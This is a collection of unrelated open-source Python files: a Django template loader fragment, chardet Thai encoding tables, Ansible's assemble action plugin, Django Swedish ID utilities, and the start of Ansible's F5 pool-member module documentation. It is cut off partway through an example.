raise NotImplementedError( 'subclasses of Loader must provide a load_template_source() method' ) def reset(self): """ Resets any state maintained by the loader instance (e.g. cached templates or cached loader modules). """ pass @property def supports_recursion(self): """ RemovedInDjango20Warning: This is an internal property used by the ExtendsNode during the deprecation of non-recursive loaders. """ return hasattr(self, 'get_contents')
bsd-3-clause
hkhamm/django_rest_tutorial_2
env/lib/python2.7/site-packages/pip/_vendor/requests/packages/charade/langthaimodel.py
2930
11275
######################## BEGIN LICENSE BLOCK ######################## # The Original Code is Mozilla Communicator client code. # # The Initial Developer of the Original Code is # Netscape Communications Corporation. # Portions created by the Initial Developer are Copyright (C) 1998 # the Initial Developer. All Rights Reserved. # # Contributor(s): # Mark Pilgrim - port to Python # # This library is free software; you can redistribute it and/or # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. # # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### # 255: Control characters that usually does not exist in any text # 254: Carriage/Return # 253: symbol (punctuation) that does not belong to word # 252: 0 - 9 # The following result for thai was collected from a limited sample (1M). # Character Mapping Table: TIS620CharToOrderMap = ( 255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30 253,182,106,107,100,183,184,185,101, 94,186,187,108,109,110,111, # 40 188,189,190, 89, 95,112,113,191,192,193,194,253,253,253,253,253, # 50 253, 64, 72, 73,114, 74,115,116,102, 81,201,117, 90,103, 78, 82, # 60 96,202, 91, 79, 84,104,105, 97, 98, 92,203,253,253,253,253,253, # 70 209,210,211,212,213, 88,214,215,216,217,218,219,220,118,221,222, 223,224, 99, 85, 83,225,226,227,228,229,230,231,232,233,234,235, 236, 5, 30,237, 24,238, 75, 8, 26, 52, 34, 51,119, 47, 58, 57, 49, 53, 55, 43, 20, 19, 44, 14, 48, 3, 17, 25, 39, 62, 31, 54, 45, 9, 16, 2, 61, 15,239, 12, 42, 46, 18, 21, 76, 4, 66, 63, 22, 10, 1, 36, 23, 13, 40, 27, 32, 35, 86,240,241,242,243,244, 11, 28, 41, 29, 33,245, 50, 37, 6, 7, 67, 77, 38, 93,246,247, 68, 56, 59, 65, 69, 60, 70, 80, 71, 87,248,249,250,251,252,253, ) # Model Table: # total sequences: 100% # first 512 sequences: 92.6386% # first 1024 sequences:7.3177% # rest sequences: 1.0230% # negative sequences: 0.0436% ThaiLangModel = ( 0,1,3,3,3,3,0,0,3,3,0,3,3,0,3,3,3,3,3,3,3,3,0,0,3,3,3,0,3,3,3,3, 0,3,3,0,0,0,1,3,0,3,3,2,3,3,0,1,2,3,3,3,3,0,2,0,2,0,0,3,2,1,2,2, 3,0,3,3,2,3,0,0,3,3,0,3,3,0,3,3,3,3,3,3,3,3,3,0,3,2,3,0,2,2,2,3, 0,2,3,0,0,0,0,1,0,1,2,3,1,1,3,2,2,0,1,1,0,0,1,0,0,0,0,0,0,0,1,1, 3,3,3,2,3,3,3,3,3,3,3,3,3,3,3,2,2,2,2,2,2,2,3,3,2,3,2,3,3,2,2,2, 3,1,2,3,0,3,3,2,2,1,2,3,3,1,2,0,1,3,0,1,0,0,1,0,0,0,0,0,0,0,1,1, 3,3,2,2,3,3,3,3,1,2,3,3,3,3,3,2,2,2,2,3,3,2,2,3,3,2,2,3,2,3,2,2, 3,3,1,2,3,1,2,2,3,3,1,0,2,1,0,0,3,1,2,1,0,0,1,0,0,0,0,0,0,1,0,1, 3,3,3,3,3,3,2,2,3,3,3,3,2,3,2,2,3,3,2,2,3,2,2,2,2,1,1,3,1,2,1,1, 3,2,1,0,2,1,0,1,0,1,1,0,1,1,0,0,1,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0, 3,3,3,2,3,2,3,3,2,2,3,2,3,3,2,3,1,1,2,3,2,2,2,3,2,2,2,2,2,1,2,1, 2,2,1,1,3,3,2,1,0,1,2,2,0,1,3,0,0,0,1,1,0,0,0,0,0,2,3,0,0,2,1,1, 3,3,2,3,3,2,0,0,3,3,0,3,3,0,2,2,3,1,2,2,1,1,1,0,2,2,2,0,2,2,1,1, 0,2,1,0,2,0,0,2,0,1,0,0,1,0,0,0,1,1,1,1,0,0,0,0,0,0,0,0,0,0,1,0, 3,3,2,3,3,2,0,0,3,3,0,2,3,0,2,1,2,2,2,2,1,2,0,0,2,2,2,0,2,2,1,1, 0,2,1,0,2,0,0,2,0,1,1,0,1,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0, 3,3,2,3,2,3,2,0,2,2,1,3,2,1,3,2,1,2,3,2,2,3,0,2,3,2,2,1,2,2,2,2, 1,2,2,0,0,0,0,2,0,1,2,0,1,1,1,0,1,0,3,1,1,0,0,0,0,0,0,0,0,0,1,0, 3,3,2,3,3,2,3,2,2,2,3,2,2,3,2,2,1,2,3,2,2,3,1,3,2,2,2,3,2,2,2,3, 3,2,1,3,0,1,1,1,0,2,1,1,1,1,1,0,1,0,1,1,0,0,0,0,0,0,0,0,0,2,0,0, 1,0,0,3,0,3,3,3,3,3,0,0,3,0,2,2,3,3,3,3,3,0,0,0,1,1,3,0,0,0,0,2, 0,0,1,0,0,0,0,0,0,0,2,3,0,0,0,3,0,2,0,0,0,0,0,3,0,0,0,0,0,0,0,0, 2,0,3,3,3,3,0,0,2,3,0,0,3,0,3,3,2,3,3,3,3,3,0,0,3,3,3,0,0,0,3,3, 0,0,3,0,0,0,0,2,0,0,2,1,1,3,0,0,1,0,0,2,3,0,1,0,0,0,0,0,0,0,1,0, 3,3,3,3,2,3,3,3,3,3,3,3,1,2,1,3,3,2,2,1,2,2,2,3,1,1,2,0,2,1,2,1, 2,2,1,0,0,0,1,1,0,1,0,1,1,0,0,0,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0, 3,0,2,1,2,3,3,3,0,2,0,2,2,0,2,1,3,2,2,1,2,1,0,0,2,2,1,0,2,1,2,2, 0,1,1,0,0,0,0,1,0,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0, 3,3,3,3,2,1,3,3,1,1,3,0,2,3,1,1,3,2,1,1,2,0,2,2,3,2,1,1,1,1,1,2, 3,0,0,1,3,1,2,1,2,0,3,0,0,0,1,0,3,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0, 3,3,1,1,3,2,3,3,3,1,3,2,1,3,2,1,3,2,2,2,2,1,3,3,1,2,1,3,1,2,3,0, 2,1,1,3,2,2,2,1,2,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2, 3,3,2,3,2,3,3,2,3,2,3,2,3,3,2,1,0,3,2,2,2,1,2,2,2,1,2,2,1,2,1,1, 2,2,2,3,0,1,3,1,1,1,1,0,1,1,0,2,1,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0, 3,3,3,3,2,3,2,2,1,1,3,2,3,2,3,2,0,3,2,2,1,2,0,2,2,2,1,2,2,2,2,1, 3,2,1,2,2,1,0,2,0,1,0,0,1,1,0,0,0,0,0,1,1,0,1,0,0,0,0,0,0,0,0,1, 3,3,3,3,3,2,3,1,2,3,3,2,2,3,0,1,1,2,0,3,3,2,2,3,0,1,1,3,0,0,0,0, 3,1,0,3,3,0,2,0,2,1,0,0,3,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 3,3,3,2,3,2,3,3,0,1,3,1,1,2,1,2,1,1,3,1,1,0,2,3,1,1,1,1,1,1,1,1, 3,1,1,2,2,2,2,1,1,1,0,0,2,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1, 3,2,2,1,1,2,1,3,3,2,3,2,2,3,2,2,3,1,2,2,1,2,0,3,2,1,2,2,2,2,2,1, 3,2,1,2,2,2,1,1,1,1,0,0,1,1,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0, 3,3,3,3,3,3,3,3,1,3,3,0,2,1,0,3,2,0,0,3,1,0,1,1,0,1,0,0,0,0,0,1, 1,0,0,1,0,3,2,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 3,0,2,2,2,3,0,0,1,3,0,3,2,0,3,2,2,3,3,3,3,3,1,0,2,2,2,0,2,2,1,2, 0,2,3,0,0,0,0,1,0,1,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1, 3,0,2,3,1,3,3,2,3,3,0,3,3,0,3,2,2,3,2,3,3,3,0,0,2,2,3,0,1,1,1,3, 0,0,3,0,0,0,2,2,0,1,3,0,1,2,2,2,3,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1, 3,2,3,3,2,0,3,3,2,2,3,1,3,2,1,3,2,0,1,2,2,0,2,3,2,1,0,3,0,0,0,0, 3,0,0,2,3,1,3,0,0,3,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 3,1,3,2,2,2,1,2,0,1,3,1,1,3,1,3,0,0,2,1,1,1,1,2,1,1,1,0,2,1,0,1, 1,2,0,0,0,3,1,1,0,0,0,0,1,0,1,0,0,1,0,1,0,0,0,0,0,3,1,0,0,0,1,0, 3,3,3,3,2,2,2,2,2,1,3,1,1,1,2,0,1,1,2,1,2,1,3,2,0,0,3,1,1,1,1,1, 3,1,0,2,3,0,0,0,3,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,2,3,0,3,3,0,2,0,0,0,0,0,0,0,3,0,0,1,0,0,0,0,0,0,0,0,0,0,0, 0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,2,3,1,3,0,0,1,2,0,0,2,0,3,3,2,3,3,3,2,3,0,0,2,2,2,0,0,0,2,2, 0,0,1,0,0,0,0,3,0,0,0,0,2,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0, 0,0,0,3,0,2,0,0,0,0,0,0,0,0,0,0,1,2,3,1,3,3,0,0,1,0,3,0,0,0,0,0, 0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 3,3,1,2,3,1,2,3,1,0,3,0,2,2,1,0,2,1,1,2,0,1,0,0,1,1,1,1,0,1,0,0, 1,0,0,0,0,1,1,0,3,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 3,3,3,3,2,1,0,1,1,1,3,1,2,2,2,2,2,2,1,1,1,1,0,3,1,0,1,3,1,1,1,1, 1,1,0,2,0,1,3,1,1,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,2,0,1, 3,0,2,2,1,3,3,2,3,3,0,1,1,0,2,2,1,2,1,3,3,1,0,0,3,2,0,0,0,0,2,1, 0,1,0,0,0,0,1,2,0,1,1,3,1,1,2,2,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0, 0,0,3,0,0,1,0,0,0,3,0,0,3,0,3,1,0,1,1,1,3,2,0,0,0,3,0,0,0,0,2,0, 0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,2,0,0,0,0,0,0,0,0,0, 3,3,1,3,2,1,3,3,1,2,2,0,1,2,1,0,1,2,0,0,0,0,0,3,0,0,0,3,0,0,0,0, 3,0,0,1,1,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 3,0,1,2,0,3,3,3,2,2,0,1,1,0,1,3,0,0,0,2,2,0,0,0,0,3,1,0,1,0,0,0, 0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 3,0,2,3,1,2,0,0,2,1,0,3,1,0,1,2,0,1,1,1,1,3,0,0,3,1,1,0,2,2,1,1, 0,2,0,0,0,0,0,1,0,1,0,0,1,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 3,0,0,3,1,2,0,0,2,2,0,1,2,0,1,0,1,3,1,2,1,0,0,0,2,0,3,0,0,0,1,0, 0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 3,0,1,1,2,2,0,0,0,2,0,2,1,0,1,1,0,1,1,1,2,1,0,0,1,1,1,0,2,1,1,1, 0,1,1,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,1, 0,0,0,2,0,1,3,1,1,1,1,0,0,0,0,3,2,0,1,0,0,0,1,2,0,0,0,1,0,0,0,0, 0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,3,3,3,3,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 1,0,2,3,2,2,0,0,0,1,0,0,0,0,2,3,2,1,2,2,3,0,0,0,2,3,1,0,0,0,1,1, 0,0,1,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,1,1,0,1,0,0,0,0,0,0,0,0,0, 3,3,2,2,0,1,0,0,0,0,2,0,2,0,1,0,0,0,1,1,0,0,0,2,1,0,1,0,1,1,0,0, 0,1,0,2,0,0,1,0,3,0,1,0,0,0,2,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 3,3,1,0,0,1,0,0,0,0,0,1,1,2,0,0,0,0,1,0,0,1,3,1,0,0,0,0,1,1,0,0, 0,1,0,0,0,0,3,0,0,0,0,0,0,3,0,0,0,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0, 3,3,1,1,1,1,2,3,0,0,2,1,1,1,1,1,0,2,1,1,0,0,0,2,1,0,1,2,1,1,0,1, 2,1,0,3,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 1,3,1,0,0,0,0,0,0,0,3,0,0,0,3,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,1, 0,0,0,2,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 3,3,2,0,0,0,0,0,0,1,2,1,0,1,1,0,2,0,0,1,0,0,2,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,2,0,0,0,1,3,0,1,0,0,0,2,0,0,0,0,0,0,0,1,2,0,0,0,0,0, 3,3,0,0,1,1,2,0,0,1,2,1,0,1,1,1,0,1,1,0,0,2,1,1,0,1,0,0,1,1,1,0, 0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,3,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0, 2,2,2,1,0,0,0,0,1,0,0,0,0,3,0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,0,0,0, 2,0,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 2,3,0,0,1,1,0,0,0,2,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 1,1,0,1,2,0,1,2,0,0,1,1,0,2,0,1,0,0,1,0,0,0,0,1,0,0,0,2,0,0,0,0, 1,0,0,1,0,1,1,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,1,0,0,0,0,0,0,0,1,1,0,1,1,0,2,1,3,0,0,0,0,1,1,0,0,0,0,0,0,0,3, 1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 2,0,1,0,1,0,0,2,0,0,2,0,0,1,1,2,0,0,1,1,0,0,0,1,0,0,0,1,1,0,0,0, 1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0, 1,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,1,1,0,0,0, 2,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 2,0,0,0,0,2,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,3,0,0,0, 2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,1,0,0,0,0, 1,0,0,0,0,0,0,0,0,1,0,0,0,0,2,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,1,1,0,0,2,1,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, ) TIS620ThaiModel = { 'charToOrderMap': TIS620CharToOrderMap, 'precedenceMatrix': ThaiLangModel, 'mTypicalPositiveRatio': 0.926386, 'keepEnglishLetter': False, 'charsetName': "TIS-620" } # flake8: noqa
mit
ehashman/oh-mainline
vendor/packages/requests/requests/packages/chardet/compat.py
2943
1157
######################## BEGIN LICENSE BLOCK ######################## # Contributor(s): # Ian Cordasco - port to Python # # This library is free software; you can redistribute it and/or # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. # # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### import sys if sys.version_info < (3, 0): base_str = (str, unicode) else: base_str = (bytes, str) def wrap_ord(a): if sys.version_info < (3, 0) and isinstance(a, base_str): return ord(a) else: return a
agpl-3.0
tedder/ansible
lib/ansible/plugins/action/assemble.py
60
6409
# (c) 2013-2016, Michael DeHaan <michael.dehaan@gmail.com> # Stephen Fromm <sfromm@gmail.com> # Brian Coca <briancoca+dev@gmail.com> # Toshio Kuratomi <tkuratomi@ansible.com> # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License from __future__ import (absolute_import, division, print_function) __metaclass__ = type import codecs import os import os.path import re import tempfile from ansible import constants as C from ansible.errors import AnsibleError, AnsibleAction, _AnsibleActionDone, AnsibleActionFail from ansible.module_utils._text import to_native, to_text from ansible.module_utils.parsing.convert_bool import boolean from ansible.plugins.action import ActionBase from ansible.utils.hashing import checksum_s class ActionModule(ActionBase): TRANSFERS_FILES = True def _assemble_from_fragments(self, src_path, delimiter=None, compiled_regexp=None, ignore_hidden=False, decrypt=True): ''' assemble a file from a directory of fragments ''' tmpfd, temp_path = tempfile.mkstemp(dir=C.DEFAULT_LOCAL_TMP) tmp = os.fdopen(tmpfd, 'wb') delimit_me = False add_newline = False for f in (to_text(p, errors='surrogate_or_strict') for p in sorted(os.listdir(src_path))): if compiled_regexp and not compiled_regexp.search(f): continue fragment = u"%s/%s" % (src_path, f) if not os.path.isfile(fragment) or (ignore_hidden and os.path.basename(fragment).startswith('.')): continue with open(self._loader.get_real_file(fragment, decrypt=decrypt), 'rb') as fragment_fh: fragment_content = fragment_fh.read() # always put a newline between fragments if the previous fragment didn't end with a newline. if add_newline: tmp.write(b'\n') # delimiters should only appear between fragments if delimit_me: if delimiter: # un-escape anything like newlines delimiter = codecs.escape_decode(delimiter)[0] tmp.write(delimiter) # always make sure there's a newline after the # delimiter, so lines don't run together if delimiter[-1] != b'\n': tmp.write(b'\n') tmp.write(fragment_content) delimit_me = True if fragment_content.endswith(b'\n'): add_newline = False else: add_newline = True tmp.close() return temp_path def run(self, tmp=None, task_vars=None): self._supports_check_mode = False result = super(ActionModule, self).run(tmp, task_vars) del tmp # tmp no longer has any effect if task_vars is None: task_vars = dict() src = self._task.args.get('src', None) dest = self._task.args.get('dest', None) delimiter = self._task.args.get('delimiter', None) remote_src = self._task.args.get('remote_src', 'yes') regexp = self._task.args.get('regexp', None) follow = self._task.args.get('follow', False) ignore_hidden = self._task.args.get('ignore_hidden', False) decrypt = self._task.args.get('decrypt', True) try: if src is None or dest is None: raise AnsibleActionFail("src and dest are required") if boolean(remote_src, strict=False): result.update(self._execute_module(module_name='assemble', task_vars=task_vars)) raise _AnsibleActionDone() else: try: src = self._find_needle('files', src) except AnsibleError as e: raise AnsibleActionFail(to_native(e)) if not os.path.isdir(src): raise AnsibleActionFail(u"Source (%s) is not a directory" % src) _re = None if regexp is not None: _re = re.compile(regexp) # Does all work assembling the file path = self._assemble_from_fragments(src, delimiter, _re, ignore_hidden, decrypt) path_checksum = checksum_s(path) dest = self._remote_expand_user(dest) dest_stat = self._execute_remote_stat(dest, all_vars=task_vars, follow=follow) diff = {} # setup args for running modules new_module_args = self._task.args.copy() # clean assemble specific options for opt in ['remote_src', 'regexp', 'delimiter', 'ignore_hidden', 'decrypt']: if opt in new_module_args: del new_module_args[opt] new_module_args['dest'] = dest if path_checksum != dest_stat['checksum']: if self._play_context.diff: diff = self._get_diff_data(dest, path, task_vars) remote_path = self._connection._shell.join_path(self._connection._shell.tmpdir, 'src') xfered = self._transfer_file(path, remote_path) # fix file permissions when the copy is done as a different user self._fixup_perms2((self._connection._shell.tmpdir, remote_path)) new_module_args.update(dict(src=xfered,)) res = self._execute_module(module_name='copy', module_args=new_module_args, task_vars=task_vars) if diff: res['diff'] = diff result.update(res) else: result.update(self._execute_module(module_name='file', module_args=new_module_args, task_vars=task_vars)) except AnsibleAction as e: result.update(e.result) finally: self._remove_tmp_path(self._connection._shell.tmpdir) return result
gpl-3.0
alx-eu/django
django/contrib/localflavor/se/utils.py
104
2430
import datetime from django.utils import six def id_number_checksum(gd): """ Calculates a Swedish ID number checksum, using the "Luhn"-algoritm """ n = s = 0 for c in (gd['year'] + gd['month'] + gd['day'] + gd['serial']): tmp = ((n % 2) and 1 or 2) * int(c) if tmp > 9: tmp = sum([int(i) for i in str(tmp)]) s += tmp n += 1 if (s % 10) == 0: return 0 return (((s // 10) + 1) * 10) - s def validate_id_birthday(gd, fix_coordination_number_day=True): """ Validates the birth_day and returns the datetime.date object for the birth_day. If the date is an invalid birth day, a ValueError will be raised. """ today = datetime.date.today() day = int(gd['day']) if fix_coordination_number_day and day > 60: day -= 60 if gd['century'] is None: # The century was not specified, and need to be calculated from todays date current_year = today.year year = int(today.strftime('%Y')) - int(today.strftime('%y')) + int(gd['year']) if ('%s%s%02d' % (gd['year'], gd['month'], day)) > today.strftime('%y%m%d'): year -= 100 # If the person is older than 100 years if gd['sign'] == '+': year -= 100 else: year = int(gd['century'] + gd['year']) # Make sure the year is valid # There are no swedish personal identity numbers where year < 1800 if year < 1800: raise ValueError # ValueError will be raise for invalid dates birth_day = datetime.date(year, int(gd['month']), day) # birth_day must not be in the future if birth_day > today: raise ValueError return birth_day def format_personal_id_number(birth_day, gd): # birth_day.strftime cannot be used, since it does not support dates < 1900 return six.text_type(str(birth_day.year) + gd['month'] + gd['day'] + gd['serial'] + gd['checksum']) def format_organisation_number(gd): if gd['century'] is None: century = '' else: century = gd['century'] return six.text_type(century + gd['year'] + gd['month'] + gd['day'] + gd['serial'] + gd['checksum']) def valid_organisation(gd): return gd['century'] in (None, 16) and \ int(gd['month']) >= 20 and \ gd['sign'] in (None, '-') and \ gd['year'][0] in ('2', '5', '7', '8', '9') # group identifier
bsd-3-clause
alvaroaleman/ansible
lib/ansible/modules/network/f5/bigip_pool_member.py
21
16787
#!/usr/bin/python # -*- coding: utf-8 -*- # # (c) 2013, Matt Hite <mhite@hotmail.com> # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. ANSIBLE_METADATA = {'status': ['preview'], 'supported_by': 'community', 'version': '1.0'} DOCUMENTATION = ''' --- module: bigip_pool_member short_description: Manages F5 BIG-IP LTM pool members description: - Manages F5 BIG-IP LTM pool members via iControl SOAP API version_added: 1.4 author: - Matt Hite (@mhite) - Tim Rupp (@caphrim007) notes: - Requires BIG-IP software version >= 11 - F5 developed module 'bigsuds' required (see http://devcentral.f5.com) - Best run as a local_action in your playbook - Supersedes bigip_pool for managing pool members requirements: - bigsuds options: state: description: - Pool member state required: true default: present choices: - present - absent session_state: description: - Set new session availability status for pool member version_added: 2.0 required: false default: null choices: - enabled - disabled monitor_state: description: - Set monitor availability status for pool member version_added: 2.0 required: false default: null choices: - enabled - disabled pool: description: - Pool name. This pool must exist. required: true partition: description: - Partition required: false default: 'Common' host: description: - Pool member IP required: true aliases: - address - name port: description: - Pool member port required: true connection_limit: description: - Pool member connection limit. Setting this to 0 disables the limit. required: false default: null description: description: - Pool member description required: false default: null rate_limit: description: - Pool member rate limit (connections-per-second). Setting this to 0 disables the limit. required: false default: null ratio: description: - Pool member ratio weight. Valid values range from 1 through 100. New pool members -- unless overridden with this value -- default to 1. required: false default: null preserve_node: description: - When state is absent and the pool member is no longer referenced in other pools, the default behavior removes the unused node o bject. Setting this to 'yes' disables this behavior. required: false default: 'no' choices: - yes - no version_added: 2.1 extends_documentation_fragment: f5 ''' EXAMPLES = ''' - name: Add pool member bigip_pool_member: server: "lb.mydomain.com" user: "admin" password: "secret" state: "present" pool: "my-pool" partition: "Common" host: "{{ ansible_default_ipv4["address"] }}" port: 80 description: "web server" connection_limit: 100 rate_limit: 50 ratio: 2 delegate_to: localhost - name: Modify pool member ratio and description bigip_pool_member: server: "lb.mydomain.com" user: "admin" password: "secret" state: "present" pool: "my-pool" partition: "Common" host: "{{ ansible_default_ipv4["address"] }}" port: 80 ratio: 1 description: "nginx server" delegate_to: localhost - name: Remove pool member from pool bigip_pool_member: server: "lb.mydomain.com" user: "admin" password: "secret" state: "absent" pool: "my-pool" partition: "Common" host: "{{ ansible_default_ipv4["address"] }}" port: 80 delegate_to: localhost # The BIG-IP GUI doesn't map directly to the API calls for "Pool -> # Members -> State". The following states map to API monitor # and session states. # # Enabled (all traffic allowed): # monitor_state=enabled, session_state=enabled # Disabled (only persistent or active connections allowed): # monitor_state=enabled, session_state=disabled # Forced offline (only active connections allowed): # monitor_state=disabled, session_state=disabled # # See https://devcentral.f5.com/questions/icontrol-equivalent-call-for-b-node-down - name: Force pool member offline bigip_pool_member: server: "lb.mydomain.com" user: "admin" password: "secret" state: "present" session_state: "disabled" monitor_state: "disabled" 